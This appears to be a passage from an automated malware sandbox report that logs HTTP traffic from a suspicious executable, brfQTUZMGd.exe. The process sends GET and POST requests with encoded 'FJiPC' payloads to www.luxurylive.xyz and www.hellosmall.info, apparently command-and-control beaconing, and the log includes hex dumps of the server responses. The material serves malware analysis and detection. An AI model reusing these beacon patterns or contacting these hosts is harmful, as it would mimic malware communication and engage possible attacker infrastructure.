                                                                                              Data Ascii: FJiPC=ojVwdyd9mV1E1/zKQoCSFDHur1czSOaqcIVbRL2GtXwy0gD8c1LlHvaeztz4+fYcFoGDO7Sl+caoFQpA6poD9M3plX6VoCMmFeQHLszbXIM1hmSIygHQ9S3yGqOU6PcB9kXNPsxKnWNXofQCVXPgzZoH2yRBvMoN1p5lBYNpkPIQU4+OO4cs7wV2t6l98K2TtWY5tY1LafiUbAEKxSjkPpVWZ0NAAj/SniodSo8wxmFkR3TaVJzQGdBAvNs14aNOwx99WIRsYbYKnrGmQe5YzFxMh//nc8T7XKjoW8OVn0ufFXZ12YK9O223vqsyXpM9O//Rtv7hZsRFt1vcwRjWyHmBU9kJFg5QrqrzU6uklR4Kn6aCmQ1NnTrBQAvAnY1k3ewehEvpUquAIOaW9yMxknrrdeOXD5aqfO+SsW7QNqMwe7nTNBsq8Y1OiO6YnTokkjkMUxFmMHJlNjOhR7ur1qLl1rcnYVEh0reYCDvHHGX/1xqK9cTCgv3yk8Wvwc4L3Whvid0vy9a/SUbhD63GAV/98IKNBVPXrwEXD7ep41s46E2tYvicVZf5DA//0Rf4S7xgpTgV9Gx5ttXzuovQIsV+/ePOqY+PcJrhcSqKlm1b6ZoN5xp7Rk5YyA6DbmkyeInspBIjVNHcf+rrrFcx8rhBChpuIbnknjgjLoXHKsfDD49pBPb46ahXWTj+253egesbR04ypKXE5eUC//4zz4ZYYsQrDs7F1t3L+fho9lxMNRzPRj/YBgXR9hXEb6T3Htkv6pJSaKceK9bprGvgg3U9jM8maERNkFrh3NR+B9UIjk3MN0fosX5evko1k1y1Pv5e/yK6XWrUfhRgYDRliFxshZROTt+FbV8VasKtGrAALH9jyaS6G735fHiGB7ilnHCwLLMR3imXu6Lptd0OaRK4UrQQBkI7ukI3gieBSHanYxCfdwkAnpOW0n7J8gAeJYNAjG7idtBT4xkvj4ezz46jKm3yqLclfca+HRjrBZE1uq [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.45002184.32.84.32805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:10.911662102 CEST406OUTGET /8j8d/?2FO=QBbT1R8&FJiPC=lh9QeGQC50ZZ373XfJvrGDHHrSYqS///Rp9Ie6Cn/EIA2xGtYDPraNKli8GbiMktAJPkHJ/Gg+u1HXJ6v54myfeer2iKmQcCA8UVbpnYVYElllWY0U7drCk= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.luxurylive.xyz
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:29:11.357343912 CEST1236INHTTP/1.1 200 OK
                                                                                              Server: hcdn
                                                                                              Date: Tue, 08 Oct 2024 03:29:11 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 10072
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              x-hcdn-request-id: 0c5c470ff42ce35904df06289a109730-bos-edge3
                                                                                              Expires: Tue, 08 Oct 2024 03:29:10 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                              Oct 8, 2024 05:29:11.357373953 CEST224INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                                                                                              Oct 8, 2024 05:29:11.357409954 CEST1236INData Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                                                                                              Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                                                                                              Oct 8, 2024 05:29:11.357428074 CEST1236INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                                                                                              Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                                                                                              Oct 8, 2024 05:29:11.357460976 CEST1236INData Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                                                                                              Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                                                                                              Oct 8, 2024 05:29:11.357477903 CEST672INData Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                                                              Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                                                                                              Oct 8, 2024 05:29:11.357563972 CEST1236INData Raw: 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20 69 73 20 61 63 74 69 76 65 20 61 6e 64 20 69 73 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20
                                                                                              Data Ascii: with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger.com/hostinger-academy/dns/domain-default-img.sv
                                                                                              Oct 8, 2024 05:29:11.357582092 CEST1236INData Raw: 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 65 72 73 3c 2f 64 69 76 3e 3c 62 72 3e 3c 70 3e 4d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 65 72 73 20 69
                                                                                              Data Ascii: olumn-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger r
                                                                                              Oct 8, 2024 05:29:11.357618093 CEST1236INData Raw: 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35 3c 32 36 29 2c 31 32 38 3c 3d 65 2e 63 68 61 72 43 6f 64 65
                                                                                              Data Ascii: ))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_i
                                                                                              Oct 8, 2024 05:29:11.357641935 CEST864INData Raw: 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 20 28 31 29 22 29 3b 66
                                                                                              Data Ascii: &&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(Stri


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.450022184.94.215.26805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:16.422076941 CEST681OUTPOST /skre/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.hellosmall.info
                                                                                              Origin: http://www.hellosmall.info
                                                                                              Referer: http://www.hellosmall.info/skre/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 66 38 37 33 33 44 6b 4b 70 6c 52 70 6c 65 72 66 33 4f 6c 39 41 65 52 6e 54 61 41 59 38 4b 70 52 30 76 41 76 2f 73 37 6d 2f 76 2f 63 2f 36 68 44 6e 43 6e 38 4d 72 53 6b 4b 4d 39 58 57 37 6e 43 6f 47 4c 4b 62 67 50 4d 6c 59 6a 38 67 65 4e 54 68 63 35 4b 51 2f 71 66 75 2f 4a 4a 65 72 47 45 67 49 67 66 6a 48 71 35 32 48 50 34 4d 62 4e 4c 4f 73 34 35 32 68 54 30 48 46 6e 4f 49 78 56 62 4c 31 51 4f 76 6e 4d 58 74 4e 61 51 4a 52 63 4c 6b 2b 49 6d 46 53 63 69 4a 30 35 33 4c 54 34 52 61 52 77 74 4e 59 64 2f 43 54 65 41 6b 41 5a 54 41 50 49 39 6e 33 71 71 79 4c 77 4e 54 36 66 32 62 51 3d 3d
                                                                                              Data Ascii: FJiPC=f8733DkKplRplerf3Ol9AeRnTaAY8KpR0vAv/s7m/v/c/6hDnCn8MrSkKM9XW7nCoGLKbgPMlYj8geNThc5KQ/qfu/JJerGEgIgfjHq52HP4MbNLOs452hT0HFnOIxVbL1QOvnMXtNaQJRcLk+ImFSciJ053LT4RaRwtNYd/CTeAkAZTAPI9n3qqyLwNT6f2bQ==
                                                                                              Oct 8, 2024 05:29:17.031697035 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:16 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 13840
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                              Oct 8, 2024 05:29:17.031754017 CEST224INData Raw: 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 30 64 65 67 29 3b 0a 20 20 7d 0a 20 20 20 31 30 30 25 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79
                                                                                              Data Ascii: transform: rotateX(0deg); } 100%{ transform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px;
                                                                                              Oct 8, 2024 05:29:17.031781912 CEST1236INData Raw: 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f
                                                                                              Data Ascii: display: flex; align-items: center; justify-content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset:
                                                                                              Oct 8, 2024 05:29:17.032017946 CEST1236INData Raw: 31 31 2e 32 36 34 2d 32 32 2e 35 37 34 20 38 2e 35 37 34 2d 33 34 2e 37 31 36 2d 32 2e 36 39 32 2d 31 32 2e 31 34 31 2d 31 31 2e 33 32 36 2d 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d
                                                                                              Data Ascii: 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-
                                                                                              Oct 8, 2024 05:29:17.032035112 CEST448INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e
                                                                                              Data Ascii: "translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.4
                                                                                              Oct 8, 2024 05:29:17.032052040 CEST1236INData Raw: 31 34 20 39 2e 37 36 37 20 35 2e 32 32 39 20 32 38 2e 32 34 20 31 30 2e 32 35 37 20 34 34 2e 32 36 37 20 31 30 2e 30 31 35 20 31 36 2e 30 32 38 2d 2e 32 34 33 20 33 37 2e 34 38 2d 2e 34 38 31 20 35 32 2e 35 34 33 2d 35 2e 33 33 33 20 31 35 2e 30
                                                                                              Data Ascii: 14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.481 52.543-5.333 15.06-4.852 16.223-9.55 17.998-13.298 1.774-3.748-107.32-7.809-124.3-3.524" transform="translate(161 68)"/> </g> <g class="pao-cima">
                                                                                              Oct 8, 2024 05:29:17.032085896 CEST1236INData Raw: 33 2d 2e 37 2d 2e 38 38 32 2d 2e 36 31 32 4d 35 31 2e 36 32 31 20 39 2e 32 34 37 63 2d 2e 31 38 32 2d 2e 34 30 39 2d 2e 36 38 2d 2e 33 32 35 2d 2e 36 31 35 2e 33 36 34 2e 30 36 33 2e 36 38 37 2e 30 30 37 20 31 2e 34 38 35 2e 32 35 20 32 2e 30 36
                                                                                              Data Ascii: 3-.7-.882-.612M51.621 9.247c-.182-.409-.68-.325-.615.364.063.687.007 1.485.25 2.067.19.458.694.473.737-.25.043-.759-.109-1.592-.372-2.181M32.55 15.101c-1.206.547-1.849 1.662-1.414 2.552.188.384 1.21.504 1.46.077.188-.32.407-.629.616-.942.243-.
                                                                                              Oct 8, 2024 05:29:17.032104969 CEST1236INData Raw: 2e 34 33 37 2e 33 38 34 2e 38 33 36 2e 32 34 37 2e 35 33 37 2d 2e 31 38 35 20 31 2e 32 39 2d 2e 31 38 37 20 31 2e 38 33 32 2d 2e 33 36 34 2e 35 39 2d 2e 31 39 33 2e 33 33 37 2d 2e 35 39 31 2d 2e 34 34 31 2d 2e 35 39 31 4d 36 30 2e 35 38 39 20 39
                                                                                              Data Ascii: .437.384.836.247.537-.185 1.29-.187 1.832-.364.59-.193.337-.591-.441-.591M60.589 9.375c-.101-.522-.482-.493-.556.048-.12.852.102 1.815.423 2.412.213.396.543.02.544-.494.002-.736-.283-1.302-.411-1.966M69.955 3.569c-.44-.473-1.713-.712-2.727-.47
                                                                                              Oct 8, 2024 05:29:17.032124043 CEST672INData Raw: 2e 39 39 33 2e 39 34 32 20 31 2e 35 37 34 2e 34 37 36 2e 34 30 37 2d 2e 33 32 36 2e 37 34 36 2d 2e 37 35 35 20 31 2e 30 35 38 2d 31 2e 31 34 39 2e 33 36 34 2d 2e 34 36 32 2e 34 34 31 2d 2e 39 32 33 2e 32 37 37 2d 31 2e 33 33 38 4d 36 32 2e 39 30
                                                                                              Data Ascii: .993.942 1.574.476.407-.326.746-.755 1.058-1.149.364-.462.441-.923.277-1.338M62.906 5.209c-.447-.277-1.34-.251-1.957-.083-.279.077-.57.172-.738.298-.069.051-.108.105-.15.16-.025.038-.037.076-.038.115.043.077.042.09-.003.037-.154.243.622.357.92
                                                                                              Oct 8, 2024 05:29:17.033337116 CEST1236INData Raw: 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31
                                                                                              Data Ascii: 2-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525
                                                                                              Oct 8, 2024 05:29:17.037381887 CEST1236INData Raw: 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e
                                                                                              Data Ascii: 357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.24


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.450023184.94.215.26805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:18.957560062 CEST701OUTPOST /skre/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.hellosmall.info
                                                                                              Origin: http://www.hellosmall.info
                                                                                              Referer: http://www.hellosmall.info/skre/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 66 38 37 33 33 44 6b 4b 70 6c 52 70 6c 36 76 66 77 74 4e 39 52 75 52 6b 4f 71 41 59 79 71 70 64 30 6f 49 76 2f 74 4f 74 2f 39 72 63 78 36 78 44 32 32 54 38 50 72 53 6b 54 38 39 57 53 37 6e 2f 6f 47 48 43 62 6c 33 4d 6c 59 33 38 67 61 46 54 67 74 35 56 52 76 71 64 6d 66 4a 50 51 4c 47 45 67 49 67 66 6a 47 4f 48 32 47 6e 34 4c 76 78 4c 4f 49 6b 34 71 52 54 33 50 6c 6e 4f 4d 78 56 66 4c 31 52 74 76 6a 55 74 74 4f 79 51 4a 55 34 4c 6b 50 49 35 4d 53 63 67 57 6b 34 65 4c 6a 68 59 56 44 4e 31 4f 4c 46 51 4d 53 79 77 68 47 49 4a 52 2b 70 71 31 33 4f 5a 76 4d 35 35 65 35 69 2f 41 61 5a 78 46 79 64 59 65 68 43 54 4a 56 63 79 54 46 53 36 51 43 55 3d
                                                                                              Data Ascii: FJiPC=f8733DkKplRpl6vfwtN9RuRkOqAYyqpd0oIv/tOt/9rcx6xD22T8PrSkT89WS7n/oGHCbl3MlY38gaFTgt5VRvqdmfJPQLGEgIgfjGOH2Gn4LvxLOIk4qRT3PlnOMxVfL1RtvjUttOyQJU4LkPI5MScgWk4eLjhYVDN1OLFQMSywhGIJR+pq13OZvM55e5i/AaZxFydYehCTJVcyTFS6QCU=
                                                                                              Oct 8, 2024 05:29:19.606955051 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:19 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 13840
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
